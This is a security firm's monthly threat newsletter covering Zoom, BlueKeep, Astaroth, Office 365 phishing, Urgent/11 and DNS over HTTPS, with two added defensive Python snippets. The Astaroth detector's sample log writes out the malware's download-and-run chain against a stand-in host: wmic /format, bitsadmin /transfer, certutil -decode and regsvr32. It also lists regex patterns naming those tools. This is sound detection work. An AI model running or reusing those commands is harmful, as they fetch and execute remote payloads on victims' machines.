Shearwater Security Report | August 2019

Current Threats and Exploits

· Getting Zoomed

A flaw in Zoom, a leading online meeting and video conferencing platform, forces users onto video and audio calls without their consent.

The popular application can be misused to forcibly join people onto calls. It does this by activating microphones and video cameras on Mac computers without user permission.

Security researcher Jonathan Leitschuh, from software development automation company Gradle, was curious how clicking on a sent meeting link would start up users’ Zoom clients from a web browser. Leitschuh thought it was an “amazing bit of functionality” and wondered how it had been implemented securely by Zoom.

His curiosity led to the discovery of two serious vulnerabilities that are very simple to exploit, and which Leitschuh said expose up to 750,000 companies around the world and over four million webcams to activation by malicious websites.(1)

Zoom has released a patch to remedy the vulnerability, which can be found HERE. Once the patch is installed, malicious third parties will no longer be able to automatically activate webcams using a Zoom link.


· Watching the WatchBog

A new version of WatchBog – a cryptocurrency-mining botnet operational since late 2018 – has been discovered to have compromised more than 4,500 Linux machines since early June.

This version of WatchBog has the ability to scan Windows computers and implements a BlueKeep Remote Desktop Protocol (RDP) vulnerability scanner. It is believed that the presence of this scanner indicates that WatchBog is preparing a list of vulnerable systems to target in the future, or possibly intends to sell a list of vulnerable systems to third-party vendors for profit.

The malware is currently undetected by all security vendors.

BlueKeep is a remote code execution vulnerability present in the Windows Remote Desktop Services and enables remote unauthenticated attackers to run arbitrary code, conduct denial of service attacks and potentially take control of vulnerable systems.

In May, Microsoft patched the Remote Code Execution (RCE) flaw that impacts several versions, from Windows XP, Vista, and 7 to Windows Server 2003 and 2008, including all versions with installed Service Packs.(2)

According to Microsoft, customers who use an in-support version of Windows (i.e. Windows 7, Windows Server 2008 R2, and Windows Server 2008) and have automatic updates enabled are automatically protected by the released patch.

However, out-of-support operating systems such as Windows XP and Windows 2003 are also affected by the critical CVE-2019-0708 flaw, so users of these Windows versions must either upgrade to newer releases or apply the security updates available via KB4500705.

Windows 8 and Windows 10 users are not impacted by the vulnerability because of the strengthened security provided by Redmond with the latest Windows releases.


· Astaroth – The Great Duke of Hell

Astaroth is the Great Duke of Hell in demonology; along with Beelzebub and Lucifer, he makes up the evil trinity.

So it was appropriate that when researchers from Microsoft detected a fileless malware campaign that uses legitimate services to deliver its payload, it was dubbed Astaroth.

Microsoft detected the malware while looking into a recent spike in the use of the Windows Management Instrumentation Command-line (WMIC) tool.

When Astaroth is executed, the LNK file launches the WMIC tool with the ‘/Format’ parameter, which allows the download and execution of JavaScript code. The JavaScript code in turn downloads payloads by abusing the Bitsadmin tool.

All the payloads are Base64-encoded and decoded using the Certutil tool. The Regsvr32 tool is then used to load one of the decoded DLLs, which in turn decrypts and loads other files until the final payload, Astaroth, is injected into the Userinit process. During the entire process, all files run are legitimate system tools, which could make it difficult for legacy security solutions to detect.(3)
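Because every tool in that chain is a legitimate Windows binary, detection has to key on the sequence rather than any single process. The following is an added example, not Microsoft's or Shearwater's detection logic: it parses constructed, Sysmon-style process-creation lines (the log format, host names and the placeholder.invalid URLs are assumptions) and flags a host only when the report's stages appear in order.

```python
import re

# Stage patterns in the order the report describes the chain. Each is tested
# against the lower-cased command line of a process-creation event.
STAGES = [
    ("wmic_format", re.compile(r"\bwmic(\.exe)?\b.*[/-]format")),
    ("bitsadmin_download", re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer")),
    ("certutil_decode", re.compile(r"\bcertutil(\.exe)?\b.*-decode")),
    ("regsvr32_load", re.compile(r"\bregsvr32(\.exe)?\b")),
    ("userinit_injection", re.compile(r"\buserinit\.exe\b")),
]
STAGE_ORDER = [name for name, _ in STAGES]

# Constructed sample events (not real telemetry); placeholder.invalid stands
# in for the attacker-controlled host. One process creation per line.
SAMPLE_LOG = """\
2019-08-05T09:12:01Z host=WS01 pid=412 ppid=388 cmd=explorer.exe
2019-08-05T09:12:07Z host=WS01 pid=944 ppid=412 cmd=wmic.exe os get /format:"http://placeholder.invalid/v.xsl"
2019-08-05T09:12:09Z host=WS01 pid=961 ppid=944 cmd=bitsadmin.exe /transfer j /download http://placeholder.invalid/a.bin C:\\Users\\Public\\a.txt
2019-08-05T09:12:11Z host=WS01 pid=973 ppid=944 cmd=certutil.exe -decode C:\\Users\\Public\\a.txt C:\\Users\\Public\\a.dll
2019-08-05T09:12:12Z host=WS01 pid=980 ppid=944 cmd=regsvr32.exe /s C:\\Users\\Public\\a.dll
2019-08-05T09:12:14Z host=WS01 pid=1002 ppid=980 cmd=C:\\Windows\\System32\\userinit.exe
2019-08-05T09:30:00Z host=WS02 pid=510 ppid=400 cmd=certutil.exe -verify cert.cer
"""
EVENT_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) pid=(?P<pid>\d+) ppid=(?P<ppid>\d+) cmd=(?P<cmd>.*)$")

def parse_events(text):
    """Parse the simple key=value event format above into dicts."""
    return [m.groupdict() for m in map(EVENT_RE.match, text.splitlines()) if m]

def classify(event):
    """Name the Astaroth stage an event matches, or None for benign use."""
    cmd = event["cmd"].lower()
    return next((name for name, rx in STAGES if rx.search(cmd)), None)

def find_astaroth_chains(events, min_stages=3):
    """Return {host: [stages]} for hosts where at least min_stages appear in
    the report's order. Each tool alone is legitimate; the sequence is not."""
    hits = {}
    for host in sorted({e["host"] for e in events}):
        seen = []
        for e in events:
            stage = classify(e) if e["host"] == host else None
            if stage and stage not in seen:
                seen.append(stage)
        ranks = [STAGE_ORDER.index(s) for s in seen]
        if len(seen) >= min_stages and ranks == sorted(ranks):
            hits[host] = seen
    return hits
```

The lone `certutil -verify` on WS02 is not flagged, which is the point: the patterns fire on the chain, not on ordinary administrative use of these tools.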

Manual removal can be a lengthy and complicated process requiring advanced computer skills, so relying on your antivirus software is preferable. However, if you do need to remove Astaroth manually, CLICK HERE.


· Office 365 Licence Expiration Phishing

A new phishing campaign has been detected which targets Office 365 administrators, rather than standard users.

The phishing emails indicate there is something wrong with an organisation’s Office 365 instance and the administrator should log in to fix the problem.

A common method is to send an email claiming the licence for Office 365 is about to expire. If the administrator clicks on the provided link, they will be taken to a fake Office 365 login page hosted in Azure. Hosting the page in Azure lets the malicious actor serve it from a * URL, complete with a legitimate certificate for the site.

The seemingly legitimate domain and valid certificate may convince the administrator to enter their credentials.

As with other phishing attempts, user training and the use of multi-factor authentication will often be sufficient to protect against such attacks.(4)

With Shearwater’s ‘Phriendly Phishing’ training modules, your staff will receive ongoing, targeted education to enable them to identify and handle dangerous emails containing malware or ransomware. CLICK HERE for further information about ‘Phriendly Phishing’.


· Up the Wind River Without a Paddle

Researchers at Armis Labs have discovered 11 potentially serious security flaws affecting the Wind River VxWorks Real-Time Operating System (RTOS), described by the company as “the most widely used operating system you may never have heard about”.

Collectively named ‘Urgent/11’ by Armis Labs, the flaws affect an estimated 200 million devices, going back to a version of VxWorks released in 2006. Susceptible devices include routers, modems, firewalls, printers, VoIP phones, SCADA systems, IoT devices, and even MRI machines and elevators.

The 11 CVEs, reported some time ago, comprise six critical RCE flaws plus five less serious issues that could lead to denial of service, information leaks, or logic errors. Exploiting the flaws would be relatively easy on devices accessible from the internet or locally, while detecting exploitation would be difficult.

All versions of VxWorks since 6.5, released in 2006, are affected, as are some older versions where the software was used as a standalone TCP/IP stack, and discontinued versions of Wind River Advanced Networking Technologies.(5)

To ensure your Wind River VxWorks Real-Time Operating System is updated with the latest patches, CLICK HERE.


Other News

· VPN Flaws Affect Widely Used Products

Critical flaws in popular Virtual Private Networks (VPNs) could be exploited to gain access to corporate networks and steal data. The flaws are easily exploitable remotely and affect VPNs from Palo Alto Networks, Pulse Secure, and Fortinet.

All three have released advisories and updates to address the issues. 

While the patches have been out for a while, scans found many devices online still running the vulnerable code. Organisations should ensure that boundary protections, including VPNs, firewalls and IDS/IPS, are on maintenance schedules that prioritise updates.(6)


· BlueKeep Exploit Instructions Posted Online

On the back of the recent BlueKeep exploit, information offering directions for exploiting the BlueKeep vulnerability has been posted to GitHub.

A security researcher has published a detailed guide that shows how to execute malicious code on Windows computers still vulnerable to the critical BlueKeep vulnerability.

The move significantly lowers the bar for writing exploits capable of the kind of destructive attacks not seen since WannaCry and NotPetya in 2017.(7)

To protect against BlueKeep, we strongly recommend you apply the Windows Update, which includes a patch for the vulnerability.

If you use Remote Desktop in your environment, it’s very important to apply all the updates. If you have Remote Desktop Protocol (RDP) listening on the internet, we also strongly encourage you to move the RDP listener behind some type of second-factor authentication, such as a VPN, SSL tunnel, or RDP gateway.

You also want to enable Network Level Authentication (NLA), which is a mitigation to prevent unauthenticated access to the RDP tunnel. NLA forces users to authenticate before connecting to remote systems, which dramatically decreases the chance of success for RDP-based worms. The DART team highly recommends you enable NLA regardless of this patch, as it mitigates a whole slew of other attacks against RDP.


· Firefox Support for DNS over HTTPS

Mozilla has recently implemented support for the new protocol DNS over HTTPS into their Firefox web browser. The protocol will allow the browser to issue its own DNS queries to a remote server, with the whole session being both authenticated and encrypted using TLS.

Enabling this feature improves privacy by preventing anyone intercepting the user’s DNS traffic from seeing where the user is going. However, the same property makes it harder for legitimate parties observing the traffic to log users’ actions or block access to potentially harmful sites. In addition, because the DNS queries are tunnelled over HTTPS, an enterprise will likely find it very difficult to block them without also stopping ordinary HTTPS traffic from operating correctly.(8)
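To make the visibility point concrete, here is an added example (not Mozilla's code) that encodes a DNS query in the RFC 8484 GET form (the POST form carries the same wire message as the request body) and, from the defender's side, picks DoH lookups out of constructed proxy log lines; the log format and client addresses are assumptions, and the lookup is only visible at all because this proxy can see the URL path.

```python
import base64
import re
import struct

def build_dns_query(name, qtype=1, txid=0x1234):
    """Encode a recursion-desired DNS query in RFC 1035 wire format."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # flags: RD set
    labels = name.rstrip(".").split(".")
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels)
    return header + qname + b"\x00" + struct.pack("!HH", qtype, 1)  # class IN

def doh_get_path(name, qtype=1):
    """RFC 8484 GET form: the wire message as unpadded base64url in ?dns=."""
    b64 = base64.urlsafe_b64encode(build_dns_query(name, qtype)).rstrip(b"=")
    return "/dns-query?dns=" + b64.decode("ascii")

def queried_name(dns_param):
    """Reverse the GET encoding; None unless it is a one-question DNS query."""
    try:
        wire = base64.urlsafe_b64decode(dns_param + "=" * (-len(dns_param) % 4))
        _, flags, qdcount = struct.unpack("!HHH", wire[:6])
        if flags & 0x8000 or qdcount != 1:  # QR bit set would mean a response
            return None
        labels, pos = [], 12
        while wire[pos]:
            n = wire[pos]
            labels.append(wire[pos + 1:pos + 1 + n].decode("ascii"))
            pos += n + 1
        return ".".join(labels)
    except (ValueError, IndexError, struct.error):
        return None

# Constructed proxy log lines (not real traffic): "<client> <method> <path>".
SAMPLE_PROXY_LOG = [
    "10.0.0.5 GET " + doh_get_path("example.com"),
    "10.0.0.5 GET /index.html",
    "10.0.0.7 GET /dns-query?dns=AAAA",  # too short to be a DNS message
]
DNS_PARAM = re.compile(r"[?&]dns=([A-Za-z0-9_-]+)")

def find_doh_requests(lines):
    """Return (client, name) for requests whose dns= parameter decodes to a
    DNS query. Without TLS inspection the path is invisible: DoH is just HTTPS."""
    found = []
    for line in lines:
        client, _, path = line.split(" ", 2)
        m = DNS_PARAM.search(path)
        name = queried_name(m.group(1)) if m else None
        if name:
            found.append((client, name))
    return found
```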


To stay secure, you need to be proactive.

Cybercriminals are constantly looking for ways to exploit vulnerabilities and will use any opportunity to circumvent your security systems.

Keep on top of the latest advances in cybersecurity and ensure your organisation stays ahead of the threats with Shearwater’s team of expert consultants.

Together, we’ll develop a comprehensive security roadmap for your organisation that takes into account your specific needs and circumstances.

Take the first step towards enhancing your security and speak with us today.


This Information Security Report is brought to you by Shearwater Solutions

The Information Security Report is a monthly summary, compiled by Shearwater’s experienced cybersecurity professionals, to highlight the vulnerabilities and new attack vectors in some of the latest active threats, exploits and breaches and share recommendations to help you protect your data and stay a step ahead.

Whatever your Information Security challenge, we’re here to help you find the right solution.